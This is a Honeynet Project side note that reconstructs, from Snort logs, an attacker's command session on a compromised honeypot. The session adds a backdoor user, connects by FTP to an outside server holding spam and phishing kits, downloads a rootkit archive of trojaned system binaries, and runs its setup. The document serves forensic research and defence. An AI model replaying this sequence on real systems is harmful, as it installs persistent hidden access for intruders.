Honeynet Project
http://www.honeynet.org
Last Modified: 14th May 2005
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rookit was installed, which were again reconstructed with the help of Snort log-files.
/usr/sbin/adduser ro passwd ro 0030934040877 0030934040877 Changing password for user ro passwd: all authentication tokens updated successfully ftp -v 204.92.xxx.xxx Connected to 204.92.xxx.xxx. 220 Ftp server ready. choose Name (204.92.xxx.xxx:root): 331 User choose okay, need password. a 530 Login incorrect. bye Remote system type is UNIX. Using binary mode to transfer files. 221 Goodbye. ftp -v 204.92.xxx.xxx Connected to 204.92.xxx.xxx. 220 Ftp server ready. example Name (204.92.xxx.xxx:root): 331 User example okay, need password. choose 230-You are user #14 of 350 simultaneous users allowed. 230- 230 Restricted user logged in. hash pass deb bin Remote system type is UNIX. Using binary mode to transfer files. Hash mark printing on (1024 bytes/hash mark). Passive mode off. Debugging on (debug=1). ---> TYPE I 200 Type okay. cd cgi-bin ---> CWD cgi-bin 250 "/cgi-bin" is new cwd. cd rootkyt ---> CWD rootkyt ls 250 "/cgi-bin/rootkyt" is new cwd. ---> TYPE A 200 Type okay. ---> PORT 212,44,161,115,9,136 200 PORT command successful. ---> LIST 150 Opening ASCII mode data connection for /bin/ls. -rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt -rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz 226 Listing completed. cd .. ---> CWD .. 250 "/cgi-bin" is new cwd. ls ---> PORT 212,44,161,115,9,137 200 PORT command successful. ---> LIST 150 Opening ASCII mode data connection for /bin/ls. -rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz -rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip -rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz -rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz -rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz -rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz -rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz -rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website -rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz -rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz -rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php -rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt -rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz -rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz -rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz -rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz -rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz -rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz -rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip 226 Listing completed. cd .. ---> CWD .. ls 250 "/" is new cwd. ---> PORT 212,44,161,115,9,138 200 PORT command successful. ---> LIST 150 Opening ASCII mode data connection for /bin/ls. drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www 226 Listing completed. cd www ---> CWD www ls 250 "/www" is new cwd. ---> PORT 212,44,161,115,9,139 200 PORT command successful. ---> LIST 150 Opening ASCII mode data connection for /bin/ls. -rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz -rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm -rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz -rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie -rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz -rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz -rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz -rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz -rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz 226 Listing completed. cd .. ---> CWD .. 250 "/" is new cwd. cd cgi-bin ---> CWD cgi-bin 250 "/cgi-bin" is new cwd. cd rootkyt ---> CWD rootkyt 250 "/cgi-bin/rootkyt" is new cwd. get superwu.tgz local: superwu.tgz remote: superwu.tgz ---> TYPE I 200 Type okay. ---> PORT 212,44,161,115,9,140 200 PORT command successful. ---> RETR superwu.tgz 150 Opening BINARY mode data connection for superwu.tgz (723128 bytes). ################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################## 226 Transfer completed. bye 723128 bytes received in 96.7 secs (7.3 Kbytes/sec) ---> QUIT 221 Goodbye. tar xzvf superwu.tgz .nr/ .nr/createdir .nr/firewall .nr/status .nr/clean .nr/mailme .nr/patch .nr/remove .nr/replace .nr/startfile .nr/init .nr/sendmail/ .nr/sendmail/sshd_config .nr/sendmail/ssh_host_key .nr/sendmail/ssh_random_seed .nr/sendmail/sendmail .nr/chattr .nr/dir .nr/du .nr/encrypt .nr/fix .nr/ifconfig .nr/killall .nr/libproc.so.2.0.6 .nr/login .nr/ls .nr/lsof .nr/md5sum .nr/netstat .nr/ps .nr/pstree .nr/socklist/ .nr/socklist/Xf/ .nr/socklist/Xf/fix.c .nr/socklist/Xf/fix .nr/socklist/Xf/chattr .nr/socklist/Xf/socklistx.c .nr/socklist/Xf/socklistx .nr/socklist/Xf/move .nr/socklist/Xf/stringsx.c .nr/socklist/Xf/stringsx .nr/socklist/socklist .nr/socklist/utils/ .nr/socklist/utils/.siz.c .nr/socklist/utils/siz .nr/top .nr/vdir .nr/lg .nr/.c .nr/.d .nr/.p .nr/write .nr/read .nr/cl .nr/curatare/ .nr/curatare/ps .nr/curatare/pstree .nr/curatare/sshd .nr/curatare/clean .nr/curatare/chattr .nr/curatare/attrib setup ./setup
Click here to return to the main paper.